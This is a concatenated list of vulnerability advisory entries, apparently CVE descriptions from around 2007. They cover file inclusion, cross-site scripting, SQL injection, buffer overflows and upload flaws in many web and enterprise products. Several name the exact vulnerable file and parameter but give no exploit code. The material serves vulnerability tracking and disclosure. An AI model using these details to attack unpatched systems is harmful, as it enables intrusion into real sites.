PHP remote file inclusion vulnerability in admin.panoramic.php in the Panoramic Picture Viewer (com_panoramic) mambot (plugin) 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite (com_mosmedia) 4.5.1 component for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) credits.html.php, (2) info.html.php, (3) media.divs.php, (4) media.divs.js.php, (5) purchase.html.php, or (6) support.html.php in includes/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: vector 3 may be the same as CVE-2007-2043.2.
Multiple unspecified vulnerabilities in (1) mediasvr and (2) caloggerd in CA BrightStor ARCServe BackUp v9.01 through R11.5, and Enterprise Backup r10.5, have unknown impact and attack vectors related to memory corruption.
Unspecified vulnerability in dbasvr in CA BrightStor ARCServe BackUp v9.01 through R11.5, and Enterprise Backup r10.5, has unknown impact and attack vectors related to memory corruption.
Unspecified vulnerability in preview.php in TYPOlight webCMS 2.4.6 allows remote attackers to download arbitrary files via the src parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Ilient SysAid 4.5.03 and 4.5.04 allows remote attackers to perform some actions as administrators, as demonstrated by changing the administrator password.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Uebimiau 2.7.2 through 2.7.10 allows remote attackers to inject arbitrary web script or HTML via the f_email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in the ADM4 ActiveX control in adm4.dll in Altnet Download Manager 4.0.0.6, as used in (1) Kazaa 3.2.7 and (2) Grokster, allows remote attackers to execute arbitrary code via a long argument to the Install method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Arbor Networks Peakflow SP 3.5.1 before patch 14, and 3.6.1 before patch 5, when scope accounts are enabled, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving GET or POST requests.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Arbor Networks Peakflow SP before 3.5.1 patch 14, and 3.6.x before 3.6.1 patch 5, allows remote authenticated users to bypass access restrictions and read or write unspecified data via unknown vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in DriveLock.exe in CenterTools DriveLock 5.0 allows remote attackers to execute arbitrary code via a long HTTP request to TCP port 6061.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in iletisim.asp in Y&amp;K Iletisim Formu allow remote attackers to inject arbitrary web script or HTML via the (1) ad, (2) sehir, (3) yas, (4) cins, (5) tel, (6) mail, and (7) mesaj parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in GroupLink eHelpDesk 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) NA_DISPLAYNAME parameter in helpdesk/user/rf_create.jsp and the (2) username and (3) LDAPError parameters in index2.jsp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
Cross-site scripting (XSS) vulnerability in buscar.asp in Solidweb Novus 1.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow.  NOTE: this issue was introduced as a result of a fix for CVE-2006-3738.  As of 20071012, it is unknown whether code execution is possible.
Unspecified vulnerability in the client in Symantec Veritas Backup Exec for Windows Servers 11d has unknown impact and remote attack vectors.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Unspecified vulnerability in IAC Search &amp; Media ask.com toolbar has unknown impact and remote attack vectors.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.  NOTE: this might be the same issue as CVE-2007-5107.
SQL injection vulnerability in index.php in the Arcade module in bcoos 1.0.10 allows remote attackers to execute arbitrary SQL commands via the gid parameter in a play_game action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in PhpGedView 4.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) box_width, (2) PEDIGREE_GENERATIONS, and (3) rootid parameters in ancestry.php, and the (4) newpid parameter in timeline.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Dibbler 0.6.0 on Linux uses weak world-writable permissions for unspecified files in /var/lib/dibbler, which has unknown impact and local attack vectors.
Unspecified vulnerability in EMC VMware ACE before 1.0.3 Build 54075 allows attackers to have an unknown impact via an unspecified manipulation of "images stored in virtual machines downloaded by the user."
Buffer overflow in the Sun Java Web Start ActiveX control in Java Runtime Environment (JRE) 1.6.0_X allows remote attackers to have an unknown impact via a long argument to the dnsResolve (isInstalled.dnsResolve) method.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Phormer 3.31 allow remote attackers to inject arbitrary web script or HTML via the (1) u, (2) p, (3) c, and (4) s parameters, and other unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in picture.php in PhpWebGallery 1.7.0, when Comments for all is enabled, allows remote attackers to inject arbitrary web script or HTML via the author parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the save function in Obedit 3.03 allows user-assisted remote attackers to inject arbitrary web script or HTML via unknown vectors, as demonstrated by a SCRIPT element in an unspecified context when saving a document.  NOTE: because the details of the attack are uncertain, it is unclear whether this crosses privilege boundaries.
Cross-site scripting (XSS) vulnerability in catalog_products_with_images.php in osCMax 2.0.0-RC3-0-1 allows remote attackers to inject arbitrary web script or HTML via the URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in TinyWebGallery (TWG) 1.6.3.4 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) index.php, (2) i_frames/i_login.php, and (3) i_frames/i_top_tags.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
LetterGrade allows remote attackers to obtain sensitive information (installation path or account existence) via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in LetterGrade allow remote attackers to inject arbitrary web script or HTML via (1) a student's email address, (2) the year parameter to genbrws/Student/cal_month.php3, and other unspecified vectors related to the calendar.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in a certain ActiveX control in sparser.dll in Baofeng Storm 2.8 and earlier allow remote attackers to execute arbitrary code via malformed input in an unknown set of arguments or property values, a different DLL than CVE-2007-4816.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in modules/Discipline/StudentFieldBreakdown.php in Focus/SIS 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the FocusPath parameter, a different vector than CVE-2007-4806.  NOTE: the provenance of this information is unknown.
Unspecified vulnerability in Office Efficiencies SafeSquid 4.1.x has unknown impact and attack vectors, related to a "serious security flaw," possibly specific to Linux.
HP System Management Homepage (SMH) for Windows, when used in conjunction with HP Version Control Agent or Version Control Repository Manager, leaves old OpenSSL software active after an OpenSSL update, which has unknown impact and attack vectors, probably related to previous vulnerabilities for OpenSSL.
Unspecified vulnerability in netInvoicing before 2.7.3 has unknown impact and attack vectors, related to "security check soap".
Unspecified vulnerability in the Multiwiki plugin in XWiki before 1.1 Enterprise RC2 allows remote authenticated users, with administrative access to one wiki in a multiwiki environment, to obtain sensitive information via unknown attack vectors.  NOTE: Some of these details are obtained from third party information.
Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK33803.
Unspecified vulnerability in the Edge Component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK44789.
Multiple buffer overflows in the BaoFeng2 storm ActiveX control in Mps.dll allow remote attackers to have an unknown impact via a long (1) URL, (2) backImage, or (3) titleImage property value; (4) a long first argument to the advancedOpen method; a long argument to the (5) isDVDPath or (6) rawParse method; or (7) a .smpl file with a long path attribute in an item element in a PlayList.
Cross-site scripting (XSS) vulnerability in Domino Blogsphere 3.01 Beta 7 allows remote attackers to inject arbitrary web script or HTML via the name field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in pawfaliki.php in Pawfaliki 0.5.1 allows remote attackers to list arbitrary files via a .. (dot dot) in the page parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in upload.php in Barbo91 1.1 allows remote attackers to upload and execute arbitrary code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in admin/adminusers.php in Claroline before 1.8.6 allows remote authenticated administrators to inject arbitrary web script or HTML via the sort parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
reprepro 1.3.0 through 2.2.3 does not properly verify signatures when updating repositories, which allows remote attackers to construct and distribute an ostensibly valid Release.gpg file by signing it with an unknown key, related to the update command.
Multiple PHP remote file inclusion vulnerabilities in SpeedTech PHP Library (STPHPLibrary) 0.8.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) db_conf or (2) ADODB_DIR parameter to utils/stphpimage_show.php; or a URL in the STPHPLIB_DIR parameter to (3) stphpbutton.php, (4) stphpcheckbox.php, (5) stphpcheckboxwithcaption.php, (6) stphpcheckgroup.php, (7) stphpcomponent.php, (8) stphpcontrolwithcaption.php, (9) stphpedit.php, (10) stphpeditwithcaption.php, (11) stphphr.php, (12) stphpimage.php, (13) stphpimagewithcaption.php, (14) stphplabel.php, (15) stphplistbox.php, (16) stphplistboxwithcaption.php, (17) stphplocale.php, (18) stphppanel.php, (19) stphpradiobutton.php, (20) stphpradiobuttonwithcaption.php, (21) stphpradiogroup.php, (22) stphprichbutton.php, (23) stphpspacer.php, (24) stphptable.php, (25) stphptablecell.php, (26) stphptablerow.php, (27) stphptabpanel.php, (28) stphptabtitle.php, (29) stphptextarea.php, (30) stphptextareawithcaption.php, (31) stphptoolbar.php, (32) stphpwindow.php, (33) stphpxmldoc.php, or (34) stphpxmlelement.php, a different set of vectors than CVE-2007-4737.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in WebKit on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to use Safari as an indirect proxy and send attacker-controlled data to arbitrary TCP ports via unknown vectors.
Unspecified vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application termination) or execute arbitrary code via unknown vectors related to browser history, which triggers memory corruption.
Race condition in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to obtain information for forms from other sites via unknown vectors related to "page transitions" in Safari.
Unspecified "input validation" vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to modify form field values via unknown vectors related to file uploads.
Unspecified vulnerability in PHP before 5.2.4 has unknown impact and attack vectors, related to an "Improved fix for MOPB-03-2007," probably a variant of CVE-2007-1285.
Unspecified vulnerability in the server in Firebird before 2.0.2 allows remote attackers to determine the existence of arbitrary files, and possibly obtain other "file access," via unknown vectors, aka CORE-1312.
Unspecified vulnerability in the (1) attach database and (2) create database functionality in Firebird before 2.0.2, when a filename exceeds MAX_PATH_LEN, has unknown impact and attack vectors, aka CORE-1405.
Buffer overflow in the php_openssl_make_REQ function in PHP before 5.2.4 has unknown impact and attack vectors.
The chunk_split function in string.c in PHP 5.2.3 does not properly calculate the needed buffer size due to precision loss when performing integer arithmetic with floating point numbers, which has unknown attack vectors and impact, possibly resulting in a heap-based buffer overflow.  NOTE: this is due to an incomplete fix for CVE-2007-2872.
Unspecified vulnerability in the chunk_split function in PHP before 5.2.4 has unknown impact and attack vectors, related to an incorrect size calculation.
The zend_alter_ini_entry function in PHP before 5.2.4 does not properly handle an interruption to the flow of execution triggered by a memory_limit violation, which has unknown impact and attack vectors.
The money_format function in PHP 5 before 5.2.4, and PHP 4 before 4.4.8, permits multiple (1) %i and (2) %n tokens, which has unknown impact and attack vectors, possibly related to a format string vulnerability.
Unspecified vulnerability in Adobe Connect Enterprise Server 6 allows remote attackers to read certain pages that are restricted to the administrator via unknown vectors.
Multiple unspecified vulnerabilities in Gallery before 2.2.3 allow attackers to (1) rename items, (2) read and modify item properties, or (3) lock and replace items via unknown vectors in (a) the WebDAV module; and (4) edit unspecified data files using "linked items" in WebDAV and (b) Reupload modules.
xGB.php in xGB 2.0 does not require authentication for an admin edit action, which allows remote attackers to make unspecified changes via an unknown series of steps.
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe.  NOTE: this might be related to CVE-2007-4515.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Entrust Entelligence Security Provider (ESP) 8 does not properly validate certificates in certain circumstances involving (1) a chain that omits the root Certification Authority (CA) certificate, or an application that specifies disregarding (2) unknown revocation statuses during path validation or (3) certain errors in the certification path, which might allow context-dependent attackers to spoof certificate authentication.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in vstor2-ws60.sys in VMWare Workstation 6.0 allows local users to cause a denial of service (host operating system crash) via unspecified vectors, as demonstrated by the DC2 test suite, possibly a related issue to CVE-2007-4591.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The get_system_info command in Ignite-UX C.7.0 through C.7.3, and DynRootDisk (DRD) A.1.0.16.417 through A.2.0.0.592, on HP-UX B.11.11, B.11.23, and B.11.31 does not inform local users of networking changes made by the command, which has unknown impact and attack vectors.
Unspecified vulnerability in the "stack unwinder fixes" in kernel in Red Hat Enterprise Linux 5, when running on AMD64 and Intel 64, allows local users to cause a denial of service via unknown vectors.
Stack-based buffer overflow in nmbd in Samba 3.0.0 through 3.0.26a, when configured as a Primary or Backup Domain controller, allows remote attackers to have an unknown impact via crafted GETDC mailslot requests, related to handling of GETDC logon server requests.
Unrestricted file upload vulnerability in phUploader.php in phphq.Net phUploader 1.2 allows remote attackers to upload and execute arbitrary code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP ProCurve Manager and HP ProCurve Manager Plus 2.3 and earlier allows remote attackers to obtain sensitive information from the ProCurve Manager server via unknown attack vectors.
Unspecified vulnerability in PassphraseRequester in SSHKeychain before 0.8.2 beta allows attackers to obtain sensitive information (passwords) via unknown vectors, related to "poor protection."
Unrestricted file upload vulnerability in output.php in American Financing eMail Image Upload 4.1 allows remote attackers to upload and execute arbitrary code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
eZ publish before 3.8.9, and 3.9 before 3.9.3, does not properly check permissions on module views that lack a policy function, which has unknown impact and attack vectors, as demonstrated by a vulnerability in the discount functionality in the shop module.
Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO.
Unspecified vulnerability in Skype allows remote attackers to cause a denial of service (server hang) via unknown vectors related to sending long URIs, as claimed to be actively exploited on 20070817 using a "call to a specific number."  NOTE: this identifier is for the en.securitylab.ru disclosure.  According to the vendor, this issue is separate from the "sign-on issues" that reduced Skype service on 20070817, which appears to be a site-specific problem.  As of 20070821, it is not clear whether this issue is simply a symptom of the larger sign-on problem.
Lhaz 1.33 allows remote attackers to execute arbitrary code via unknown vectors, as actively exploited in August 2007 by the Exploit-LHAZ.a gzip file, a different issue than CVE-2006-4116.
IBM DB2 UDB 8 before Fixpak 15 does not properly check authorization, which allows remote authenticated users with a certain SELECT privilege to have an unknown impact via unspecified vectors.  NOTE: this issue is probably related to CVE-2007-1089, but this is uncertain due to lack of details.
Unspecified vulnerability in a "core clean" cron job created by the findutils-locate package on SUSE Linux 10.0 and 10.1 and Enterprise Server 9 and 10 before 20070810 allows local users to delete of arbitrary files via unknown vectors.
Unspecified vulnerability in NetWin SurgeMail 38k on Windows Server 2003 has unknown impact and remote attack vectors.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Multiple cross-site scripting (XSS) vulnerabilities in signup.php in Article Dashboard allow remote attackers to inject arbitrary web script or HTML via the (1) f_emailaddress, (2) f_reemailaddress, and other unspecified parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in article.php in Article Dashboard, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a print action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CerbNG for FreeBSD 4.8 does not properly implement VM protection when attempting to prevent system call wrapper races, which allows local users to have an unknown impact related to an "incorrect write protection of pages".
Unspecified vulnerability in assp.pl in Anti-Spam SMTP Proxy Server (ASSP) 1.3.3 has unknown impact and attack vectors.
Unspecified vulnerability in the server side of the Secure Copy (SCP) implementation in Cisco 12.2-based IOS allows remote authenticated users to read, write or overwrite any file on the device's filesystem via unknown vectors.
Multiple unspecified vulnerabilities in Camera Life before 2.6 allow attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in KDE Konqueror 3.5.7 and earlier allows remote attackers to cause a denial of service (failed assertion and application crash) via certain malformed HTML, as demonstrated by a document containing TEXTAREA, BUTTON, BR, BDO, PRE, FRAMESET, and A tags.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in Motorola Timbuktu Pro before 8.6.5 for Windows allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via (1) a long user name and (2) certain malformed requests; and (3) allow remote Timbuktu servers to have an unknown impact via a malformed HELLO response, related to the Scanner component and possibly related to a malformed computer name.
Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.11 and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.  NOTE: this is probably different from CVE-2007-0916, but this is not certain due to lack of vendor details.
Multiple unspecified vulnerabilities in EQDKP Plus before 0.4.4.5 have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Interspire ArticleLive NX before 1.7.1.2 have unknown impact and attack vectors, possibly related to (1) AL_SANITIZE and (2) "Calling the constructor to make sure things are checked, safe mode, etc."
Cross-site scripting (XSS) vulnerability in webevent.cgi in WebEvent 2.61 through 4.03 allows remote attackers to inject arbitrary web script or HTML via the cmd parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Red Hat Network Satellite Server 5.0.0 allows remote authenticated users to execute arbitrary code via unknown vectors in a "back-end XMLRPC handler."
Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.11, B.11.23, and B.11.31 allows remote attackers to cause an unspecified denial of service via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to inc/lib/screen.php or (2) the title parameter to post.php.  NOTE: vector 2 might overlap CVE-2006-6283.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.asp in Alisveris Sitesi Scripti allow remote attackers to execute arbitrary SQL commands via the (1) product_id or (2) cat_id parameter in a product mod action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.asp in Alisveris Sitesi Scripti allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search mod action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Low Bandwidth X proxy (lbxproxy) on Sun Solaris 8 through 10 before 20070725 allows local users to read arbitrary files with root group ownership via unknown vectors.
Cross-site scripting (XSS) vulnerability in utilities/login.asp in nukedit 4.9.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in W1L3D4_aramasonuc.asp in W1L3D4 Philboard 0.3 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Citrix Access Gateway Advanced Edition before firmware 4.5.5 allows attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors.
Cross-site scripting (XSS) vulnerability in a certain index.php installation script related to the (1) Blix 0.9.1, (2) Blixed 1.0, and (3) BlixKrieg (Blix Krieg) 2.2 themes for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in (1) Net6Helper.DLL (aka Net6Launcher Class) 4.5.2 and earlier, (2) npCtxCAO.dll (aka Citrix Endpoint Analysis Client) in a Firefox plugin directory, and (3) a second npCtxCAO.dll (aka CCAOControl Object) before 4.5.0.0 in Citrix Access Gateway Standard Edition before 4.5.5 and Advanced Edition before 4.5 HF1 have unknown impact and attack vectors, possibly related to buffer overflows.  NOTE: vector 3 might overlap CVE-2007-3679.
Cisco 4100 and 4400, Airespace 4000, and Catalyst 6500 and 3750 Wireless LAN Controller (WLC) software before 3.2 20070727, 4.0 before 20070727, and 4.1 before 4.1.180.0 allows remote attackers to cause a denial of service (traffic amplification or ARP storm) via a crafted unicast ARP request that (1) has a destination MAC address unknown to the Layer-2 infrastructure, aka CSCsj69233; or (2) occurs during Layer-3 roaming across IP subnets, aka CSCsj70841.
Buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 has unknown impact and remote attack vectors, aka ZD-00000034.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Unspecified vulnerability in the attachment filter in Kerio MailServer before 6.4.1 has unknown impact and remote attack vectors.
SQL injection vulnerability in vir_login.asp in iExpress Property Pro allows remote attackers to execute arbitrary SQL commands via the Password parameter.  NOTE: the Username parameter is covered by CVE-2006-6029.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in default.asp in Dora Emlak 1.0, when the goster parameter is set to emlakdetay, allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in default.asp in Dora Emlak 1.0, when the goster parameter is set to iletisim, allow remote attackers to inject arbitrary web script or HTML via the (1) Adiniz and (2) Soyadiniz parameters; and possibly other unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Absolute path traversal vulnerability in the Data Dynamics DDActiveReports2.ActiveReport.2 (ActiveReports) ActiveX control in arpro2.dll in ActiveReports 2.0 Professional Edition 2.5.0.1308 (SP5 RC) allows remote attackers to create or overwrite arbitrary files via a full pathname in an argument to the SaveLayout method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in uFMOD before 1.2.5 has unknown impact and attack vectors, possibly related to malformed files, and possibly an integer signedness error for relative note instruments.
Multiple unspecified vulnerabilities in IBM WebSphere Application Server (WAS) before Fix Pack 21 (6.0.2.21) have unknown impact and attack vectors, aka (1) PK33799, or (2) a "Potential security exposure" in the Samples component (PK40213).
Cross-site scripting (XSS) vulnerability in profile.php in Jasmine CMS 1.0_1 allows remote authenticated users to inject arbitrary web script or HTML via the profile_email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in Ipswitch IMail Server 2006 before 2006.21 (1) allow remote attackers to execute arbitrary code via unspecified vectors in Imailsec and (2) allow attackers to have an unknown impact via an unspecified vector related to "subscribe."
Cross-site scripting (XSS) vulnerability in philboard_search.asp in husrevforum 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the Human Capital Management component in Oracle PeopleSoft Enterprise 8.9 Bundle 11 allow local users to have unknown impact via unknown vectors, aka (1) PSE06 and (2) PSE07.
Multiple unspecified vulnerabilities in the Customer Relationship Management Online Marketing component in Oracle PeopleSoft Enterprise 8.9 Bundle 26 and 9.0 Bundle 7 allow remote authenticated users to have an unknown impact, aka (1) PSE04 and (2) PSE05.
Multiple unspecified vulnerabilities in PeopleTools in Oracle PeopleSoft Enterprise 8.22.15, 8.47.13, 8.48.10, and 8.49.02 allows remote authenticated users or attackers to have an unknown impact via multiple vectors, aka (1) PSE01, (2) PSE02, and (3) PSE03.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10CU2 have unknown impact and attack vectors, related to (1) APPS04, (2) APPS05, and (3) APPS06 in (a) Oracle Application Object Library, (4) APPS07 in Oracle Customer Intelligence, (5) APPS08 in Oracle Payments, (7) APPS10 in Oracle Human Resources, and (8) APPS11 in iRecruitment.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10CU2 and 12.0.1 allow remote attackers to have an unknown impact via (a) Oracle Configurator (APPS02), (b) Oracle iExpenses (APPS03), (c) Oracle Application Object Library (APPS09), and (1) APPS12, (2) APPS13, and (3) APPS14 in (d) Oracle Payables.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 12.0.1 has unknown impact and remote attack vectors, aka APPS01.
Multiple unspecified vulnerabilities in Oracle Collaboration Suite 10.1.2 have unknown impact and remote attack vectors via (1) Instant Messaging/Presence (OCS01) and (2) Oracle Single Sign On (AS02).
Unspecified vulnerability in Oracle JDeveloper for Application Server 10.1.2.2 and 10.1.3.1, and Collaboration Suite 10.1.2, allows context-dependent attackers to have an unknown impact via custom applications that use JBO.SERVER, aka JDEV02.
Unspecified vulnerability in Oracle Application Server 9.0.4.3 and 10.1.2.0.2 allows remote attackers to have an unknown impact via Oracle Single Sign On, aka AS01.
Unspecified vulnerability in Oracle Jdeveloper in Oracle Application Server 10.1.2.2 and Collaboration Suite 10.1.2 allows context-dependent attackers to have an unknown impact via custom applications that use JBO.KEY, aka JDEV01.
Unspecified vulnerability in Oracle Application Express (formerly Oracle HTML DB) 2.2.0.00.32 up to 3.0.0.00.20 allows developers to have an unknown impact via unknown attack vectors, aka APEX01.  NOTE: a reliable researcher states that this is SQL injection in the wwv_flow_security.check_db_password function due to insufficient checks for '"' characters.
Unspecified vulnerability in the Oracle Internet Directory component for Oracle Database 9.2.0.8 and 9.2.0.8DV; Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2; and Collaboration Suite 10.1.2 has unknown impact and remote attack vectors, aka OID01.
Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 allow remote authenticated users to have an unknown impact via (1) EXFSYS.DBMS_RLMGR_UTL in Rules Manager (DB11) and (2) Program Interface (DB13).
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 allow remote authenticated users to have an unknown impact via (a) the Oracle Text component, including (1) unspecified vectors (DB05), (2) CTXSYS.DRVXMD (DB06), (3) CTXSYS.DRI_MOVE_CTXSYS (DB07), (4) CTXSYS.DRVXMD (DB08), and (b) JavaVM (DB14).
Unspecified vulnerability in the Oracle Data Mining component for Oracle Database 10g Release 2 10.2.0.2 and 10.2.0.3, 10g 10.1.0.5, and Oracle9i Database Release 2 9.2.0.7, 9.2.0.8, and 9.2.0.8DV has unknown impact and remote authenticated attack vectors related to DMSYS.DMP_SYS, aka DB04.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to have an unknown impact via (1) SYS.DBMS_DRS in the DataGuard component (DB03), (2) SYS.DBMS_STANDARD in the PL/SQL component (DB10), (3) MDSYS.RTREE_IDX in the Spatial component (DB16), and (4) SQL Compiler (DB17).  NOTE: a reliable researcher claims that DB17 is for using Views to perform unauthorized insert, update, or delete actions.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.5 allow remote authenticated users to have unknown impact via (1) SYS.DBMS_PRVTAQIS in the Advanced Queuing component (DB02) and (2) MDSYS.MD in the Spatial component (DB12).  NOTE: Oracle has not disputed reliable researcher claims that DB02 is for SQL injection and DB12 is for a buffer overflow.
